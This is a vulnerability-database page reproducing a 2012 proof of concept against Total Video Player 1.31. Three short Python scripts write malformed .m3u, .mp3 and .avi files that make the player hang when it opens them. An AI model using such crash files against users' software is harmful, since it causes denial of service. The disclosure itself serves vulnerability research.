Lucene search
K

Total Video Player 1.31 Proof Of Concept

🗓️ 18 Jun 2012 00:00:00Reported by 0demType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 14 Views

Total Video Player 1.31 PoC for File Handling Vulnerabilitie

Code
`#------------------------------------------------------------------#  
# Title: Total Video Player Crash Poc #  
# Date: June 17 2012 #  
# Author: 0dem #  
# Software Link: http://total_video_player.en.softonic.com/ #  
# Version: 1.31 #  
# Tested on: Win XP Sp3 #  
# Description: Player will hang, when trying to open malformed #  
# .m3u files. .mp3 and .avi files are affected too #  
#------------------------------------------------------------------#  
  
# --- m3u -----------------------------------------------  
#!/usr/bin/python  
junk = "#EXTM3U\n"  
junk += "#EXTINF:666, 0dem, 0dem\n"  
junk += "c:\\A"  
  
file = open("PoC.m3u","w")  
file.writelines(junk)  
file.close()  
  
# --- mp3 -----------------------------------------------  
#!/usr/bin/python  
junk = "\x41" * 100  
file = open("PoC.mp3","w")  
file.writelines(junk)  
file.close()  
  
# --- avi -----------------------------------------------  
#!/usr/bin/python  
junk = "\x41" * 100  
file = open("PoC.avi","w")  
file.writelines(junk)  
file.close()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Jun 2012 00:00Current
7.4High risk
Vulners AI Score7.4
14